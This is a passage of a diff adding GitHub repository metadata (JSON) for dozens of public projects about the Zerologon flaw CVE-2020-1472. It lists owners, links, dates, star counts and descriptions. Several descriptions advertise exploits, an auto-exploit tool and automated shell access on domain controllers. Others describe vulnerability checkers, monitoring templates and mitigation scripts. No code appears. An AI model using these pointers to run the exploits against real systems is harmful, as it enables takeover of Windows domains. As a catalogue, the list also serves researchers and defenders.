"https:\/\/github.com\/0xkami\/CVE-2020-1472", + "description": "CVE-2020-1472漏洞复现过程", + "fork": false, + "created_at": "2020-09-15T10:25:47Z", + "updated_at": "2021-05-12T02:52:15Z", + "pushed_at": "2020-09-15T10:39:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295716616, + "name": "CVE-2020-1472", + "full_name": "NAXG\/CVE-2020-1472", + "owner": { + "login": "NAXG", + "id": 28560949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28560949?v=4", + "html_url": "https:\/\/github.com\/NAXG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NAXG\/CVE-2020-1472", + "description": "CVE-2020-1472复现流程", + "fork": false, + "created_at": "2020-09-15T12:11:49Z", + "updated_at": "2023-06-29T17:25:25Z", + "pushed_at": "2021-04-18T11:22:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295754317, + "name": "zerologon-CVE-2020-1472", + "full_name": "thatonesecguy\/zerologon-CVE-2020-1472", + "owner": { + "login": "thatonesecguy", + "id": 34110198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34110198?v=4", + "html_url": "https:\/\/github.com\/thatonesecguy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatonesecguy\/zerologon-CVE-2020-1472", + "description": "PoC for Zerologon (CVE-2020-1472) - Exploit", + "fork": false, + "created_at": "2020-09-15T14:29:24Z", + "updated_at": "2024-11-13T13:14:22Z", + "pushed_at": "2020-09-16T11:06:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 295781919, + "name": "CVE-2020-1472-EXP", + "full_name": "k8gege\/CVE-2020-1472-EXP", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CVE-2020-1472-EXP", + "description": "Ladon Moudle CVE-2020-1472 Exploit 域控提权神器", + "fork": false, + "created_at": "2020-09-15T16:10:21Z", + "updated_at": "2024-08-12T20:05:48Z", + "pushed_at": "2020-09-15T16:40:53Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 57, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 295788757, + "name": "CVE-2020-1472", + "full_name": "jiushill\/CVE-2020-1472", + "owner": { + "login": "jiushill", + "id": 29516567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29516567?v=4", + "html_url": "https:\/\/github.com\/jiushill", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiushill\/CVE-2020-1472", + "description": "CVE-2020-1472", + "fork": false, + "created_at": "2020-09-15T16:36:40Z", + "updated_at": "2020-09-16T03:58:43Z", + "pushed_at": "2020-09-15T16:38:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295903888, + "name": "zabbix-template-CVE-2020-1472", + "full_name": "McKinnonIT\/zabbix-template-CVE-2020-1472", + "owner": { + "login": "McKinnonIT", + "id": 45773564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45773564?v=4", + "html_url": "https:\/\/github.com\/McKinnonIT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/McKinnonIT\/zabbix-template-CVE-2020-1472", + "description": "Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472. Monitors event ID's 5827, 5828 & 5829. See: https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2020-1472", + "fork": false, + "created_at": "2020-09-16T02:37:52Z", + "updated_at": "2024-08-08T07:36:29Z", + "pushed_at": "2020-09-16T02:47:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 295915198, + "name": "cve-2020-1472", + "full_name": "mstxq17\/cve-2020-1472", + "owner": { + "login": "mstxq17", + "id": 29624427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29624427?v=4", + "html_url": "https:\/\/github.com\/mstxq17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mstxq17\/cve-2020-1472", + "description": "cve-2020-1472 复现利用及其exp", + "fork": false, + "created_at": "2020-09-16T03:40:47Z", + "updated_at": "2024-10-13T05:56:43Z", + "pushed_at": "2020-09-16T15:03:32Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 106, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 295917575, + "name": "CVE-2020-1472", + "full_name": "Fa1c0n35\/CVE-2020-1472", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-16T03:54:27Z", + "updated_at": "2024-08-12T20:05:49Z", + "pushed_at": "2020-09-16T03:54:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295917979, + "name": "SecuraBV-CVE-2020-1472", + "full_name": "Fa1c0n35\/SecuraBV-CVE-2020-1472", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/SecuraBV-CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-16T03:57:04Z", + "updated_at": "2020-09-25T06:08:29Z", + "pushed_at": "2021-06-18T18:44:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295956141, + "name": "CVE-2020-1472", + "full_name": "CanciuCostin\/CVE-2020-1472", + "owner": { + "login": "CanciuCostin", + "id": 27332434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27332434?v=4", + "html_url": "https:\/\/github.com\/CanciuCostin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CanciuCostin\/CVE-2020-1472", + "description": "CVE-2020-1472 - Zero Logon vulnerability Python implementation", + "fork": false, + "created_at": "2020-09-16T07:25:22Z", + "updated_at": "2024-08-12T20:05:50Z", + "pushed_at": "2020-09-16T08:39:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 295972450, + "name": "cve-2020-1472_Tool-collection", + "full_name": "0xcccc666\/cve-2020-1472_Tool-collection", + "owner": { + "login": "0xcccc666", + "id": 71364553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71364553?v=4", + "html_url": "https:\/\/github.com\/0xcccc666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xcccc666\/cve-2020-1472_Tool-collection", + "description": "cve-2020-1472_Tool collection", + "fork": false, + "created_at": "2020-09-16T08:32:52Z", + "updated_at": "2020-11-28T04:59:11Z", + "pushed_at": "2020-09-16T09:13:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295984599, + "name": "CVE-2020-1472", + "full_name": "murataydemir\/CVE-2020-1472", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-1472", + "description": "[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)", + "fork": false, + "created_at": "2020-09-16T09:22:30Z", + "updated_at": "2024-08-12T20:05:50Z", + "pushed_at": "2020-09-16T20:59:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295992280, + "name": "CVE-2020-1472", + "full_name": "npocmak\/CVE-2020-1472", + "owner": { + "login": "npocmak", + "id": 33814019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33814019?v=4", + "html_url": "https:\/\/github.com\/npocmak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/npocmak\/CVE-2020-1472", + "description": "https:\/\/github.com\/dirkjanm\/CVE-2020-1472", + "fork": false, + "created_at": "2020-09-16T09:54:09Z", + "updated_at": "2024-11-15T14:40:19Z", + "pushed_at": "2020-09-16T09:58:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 296056571, + "name": "CVE-2020-1472", + "full_name": "victim10wq3\/CVE-2020-1472", + "owner": { + "login": "victim10wq3", + "id": 46973456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46973456?v=4", + "html_url": "https:\/\/github.com\/victim10wq3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/victim10wq3\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-16T14:25:54Z", + "updated_at": "2024-08-12T20:05:51Z", + "pushed_at": "2020-09-16T14:28:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 296388474, + "name": "zerologon", + "full_name": "zeronetworks\/zerologon", + "owner": { + "login": "zeronetworks", + "id": 46243031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46243031?v=4", + "html_url": "https:\/\/github.com\/zeronetworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeronetworks\/zerologon", + "description": "Test script for CVE-2020-1472 for both RPC\/TCP and RPC\/SMB", + "fork": false, + "created_at": "2020-09-17T16:53:17Z", + "updated_at": "2024-10-21T12:50:48Z", + "pushed_at": "2023-05-01T21:48:28Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 57, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 296468860, + "name": "CVE-2020-1472", + "full_name": "sv3nbeast\/CVE-2020-1472", + "owner": { + "login": "sv3nbeast", + "id": 55974091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55974091?v=4", + "html_url": "https:\/\/github.com\/sv3nbeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sv3nbeast\/CVE-2020-1472", + "description": " CVE-2020-1472复现时使用的py文件整理打包", + "fork": false, + "created_at": "2020-09-18T00:02:26Z", + "updated_at": "2024-08-12T20:05:54Z", + "pushed_at": "2022-12-03T01:53:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 296948762, + "name": "CVE-2020-1472-Easy", + "full_name": "midpipps\/CVE-2020-1472-Easy", + "owner": { + "login": "midpipps", + "id": 4256983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4256983?v=4", + "html_url": "https:\/\/github.com\/midpipps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/midpipps\/CVE-2020-1472-Easy", + "description": "A simple implementation\/code smash of a bunch of other repos", + "fork": false, + "created_at": "2020-09-19T20:44:40Z", + "updated_at": "2023-02-08T11:49:19Z", + "pushed_at": "2020-09-19T21:27:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 296966855, + "name": "CVE-2020-1472", + "full_name": "hectorgie\/CVE-2020-1472", + "owner": { + "login": "hectorgie", + "id": 56555336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56555336?v=4", + "html_url": "https:\/\/github.com\/hectorgie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hectorgie\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-19T23:15:41Z", + "updated_at": "2020-09-19T23:15:54Z", + "pushed_at": "2020-09-19T23:15:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 297085240, + "name": "zerologon-cve-2020-1472-notes", + "full_name": "johnpathe\/zerologon-cve-2020-1472-notes", + "owner": { + "login": "johnpathe", + "id": 8648275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8648275?v=4", + "html_url": "https:\/\/github.com\/johnpathe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/johnpathe\/zerologon-cve-2020-1472-notes", + "description": null, + "fork": false, + "created_at": "2020-09-20T13:44:16Z", + "updated_at": "2020-10-19T06:55:24Z", + "pushed_at": "2020-10-19T06:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 297260718, + "name": "CVE-2020-1472", + "full_name": "t31m0\/CVE-2020-1472", + "owner": { + "login": "t31m0", + "id": 13071219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13071219?v=4", + "html_url": "https:\/\/github.com\/t31m0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t31m0\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-21T07:24:03Z", + "updated_at": "2020-09-21T07:24:16Z", + "pushed_at": "2020-09-21T07:24:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 298383438, + "name": "CVE-2020-1472", + "full_name": "grupooruss\/CVE-2020-1472", + "owner": { + "login": "grupooruss", + "id": 43943489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43943489?v=4", + "html_url": "https:\/\/github.com\/grupooruss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grupooruss\/CVE-2020-1472", + "description": "CVE 2020-1472 Script de validación ", + "fork": false, + "created_at": "2020-09-24T20:05:21Z", + "updated_at": "2024-04-06T23:46:07Z", + "pushed_at": "2020-09-24T20:08:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 298771178, + "name": "CVE-2020-1472", + "full_name": "striveben\/CVE-2020-1472", + "owner": { + "login": "striveben", + "id": 61238912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61238912?v=4", + "html_url": "https:\/\/github.com\/striveben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/striveben\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-26T08:31:47Z", + "updated_at": "2021-09-01T09:13:51Z", + "pushed_at": "2020-09-26T08:44:42Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 299216120, + "name": "CVE-2020-1472-02-", + "full_name": "Fa1c0n35\/CVE-2020-1472-02-", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/CVE-2020-1472-02-", + "description": null, + "fork": false, + "created_at": "2020-09-28T06:53:41Z", + "updated_at": "2020-09-28T06:53:54Z", + "pushed_at": "2021-06-18T18:44:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299264416, + "name": "CVE-2020-1472", + "full_name": "Whippet0\/CVE-2020-1472", + "owner": { + "login": "Whippet0", + "id": 46486374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46486374?v=4", + "html_url": "https:\/\/github.com\/Whippet0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Whippet0\/CVE-2020-1472", + "description": "CVE-2020-1472", + "fork": false, + "created_at": "2020-09-28T09:54:31Z", + "updated_at": "2020-11-17T06:01:36Z", + "pushed_at": "2020-11-17T06:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299708288, + "name": "Zerologon_CVE-2020-1472", + "full_name": "WiIs0n\/Zerologon_CVE-2020-1472", + "owner": { + "login": "WiIs0n", + "id": 40162782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40162782?v=4", + "html_url": "https:\/\/github.com\/WiIs0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WiIs0n\/Zerologon_CVE-2020-1472", + "description": "POC for checking multiple hosts for Zerologon vulnerability", + "fork": false, + "created_at": "2020-09-29T18:45:44Z", + "updated_at": "2024-02-28T14:17:47Z", + "pushed_at": "2020-10-05T07:47:02Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 299733711, + "name": "ADZero", + "full_name": "Privia-Security\/ADZero", + "owner": { + "login": "Privia-Security", + "id": 69091374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69091374?v=4", + "html_url": "https:\/\/github.com\/Privia-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Privia-Security\/ADZero", + "description": "Zerologon AutoExploit Tool | CVE-2020-1472", + "fork": false, + "created_at": "2020-09-29T20:43:06Z", + "updated_at": "2024-07-04T19:27:50Z", + "pushed_at": "2020-10-02T13:00:21Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 299845895, + "name": "cve-2020-1472", + "full_name": "Ken-Abruzzi\/cve-2020-1472", + "owner": { + "login": "Ken-Abruzzi", + "id": 68931768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68931768?v=4", + "html_url": "https:\/\/github.com\/Ken-Abruzzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ken-Abruzzi\/cve-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-30T07:45:50Z", + "updated_at": "2020-09-30T07:57:36Z", + "pushed_at": "2020-09-30T07:57:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299977188, + "name": "Set-ZerologonMitigation", + "full_name": "rhymeswithmogul\/Set-ZerologonMitigation", + "owner": { + "login": "rhymeswithmogul", + "id": 19931245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19931245?v=4", + "html_url": "https:\/\/github.com\/rhymeswithmogul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhymeswithmogul\/Set-ZerologonMitigation", + "description": "Protect your domain controllers against Zerologon (CVE-2020-1472).", + "fork": false, + "created_at": "2020-09-30T16:10:26Z", + "updated_at": "2020-10-13T15:41:20Z", + "pushed_at": "2020-09-30T16:34:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "active-directory", + "cve-2020-1472", + "netlogon", + "powershell", + "security", + "windows-server", + "zerologon" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 302859573, + "name": "cve-2020-1472", + "full_name": "shanfenglan\/cve-2020-1472", + "owner": { + "login": "shanfenglan", + "id": 49781523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49781523?v=4", + "html_url": "https:\/\/github.com\/shanfenglan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanfenglan\/cve-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-10-10T09:00:41Z", + "updated_at": "2020-10-18T05:46:12Z", + "pushed_at": "2020-10-10T09:02:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 304362194, + "name": "zerologon", + "full_name": "maikelnight\/zerologon", + "owner": { + "login": "maikelnight", + "id": 16766265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16766265?v=4", + "html_url": "https:\/\/github.com\/maikelnight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikelnight\/zerologon", + "description": "Check for events that indicate non compatible devices -> CVE-2020-1472", + "fork": false, + "created_at": "2020-10-15T15:02:53Z", + "updated_at": "2020-11-11T09:28:46Z", + "pushed_at": "2020-11-11T09:28:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 304764704, + "name": "CVE-2020-1472_ZeroLogonChecker", + "full_name": "CPO-EH\/CVE-2020-1472_ZeroLogonChecker", + "owner": { + "login": "CPO-EH", + "id": 56457033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56457033?v=4", + "html_url": "https:\/\/github.com\/CPO-EH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CPO-EH\/CVE-2020-1472_ZeroLogonChecker", + "description": "C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon", + "fork": false, + "created_at": "2020-10-17T00:14:08Z", + "updated_at": "2023-03-07T05:41:42Z", + "pushed_at": "2021-07-20T20:29:55Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 305977168, + "name": "CVE-2020-1472", + "full_name": "puckiestyle\/CVE-2020-1472", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-10-21T09:42:34Z", + "updated_at": "2023-01-10T03:22:06Z", + "pushed_at": "2021-06-18T18:44:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 310337744, + "name": "CVE-2020-1472-visualizer", + "full_name": "mingchen-script\/CVE-2020-1472-visualizer", + "owner": { + "login": "mingchen-script", + "id": 68715366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68715366?v=4", + "html_url": "https:\/\/github.com\/mingchen-script", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mingchen-script\/CVE-2020-1472-visualizer", + "description": null, + "fork": false, + "created_at": "2020-11-05T15:17:14Z", + "updated_at": "2024-02-19T23:41:35Z", + "pushed_at": "2020-11-05T15:19:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 311800203, + "name": "The_big_Zero", + "full_name": "JayP232\/The_big_Zero", + "owner": { + "login": "JayP232", + "id": 40582783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40582783?v=4", + "html_url": "https:\/\/github.com\/JayP232", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JayP232\/The_big_Zero", + "description": "The following is the outcome of playing with CVE-2020-1472 and attempting to automate the process of gaining a shell on the DC", + "fork": false, + "created_at": "2020-11-10T22:29:56Z", + "updated_at": "2020-12-04T21:08:46Z", + "pushed_at": "2020-12-04T21:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 313376422, + "name": "CVE-2020-1472", + "full_name": "b1ack0wl\/CVE-2020-1472", + "owner": { + "login": "b1ack0wl", + "id": 14972026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14972026?v=4", + "html_url": "https:\/\/github.com\/b1ack0wl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1ack0wl\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-11-16T17:24:25Z", + "updated_at": "2022-11-27T19:24:21Z", + "pushed_at": "2020-11-16T17:38:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 323842467, + "name": "CVE-2020-1472", + "full_name": "SaharAttackit\/CVE-2020-1472", + "owner": { + "login": "SaharAttackit", + "id": 76513483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76513483?v=4", + "html_url": "https:\/\/github.com\/SaharAttackit", + "user_view_type": "public" + }, 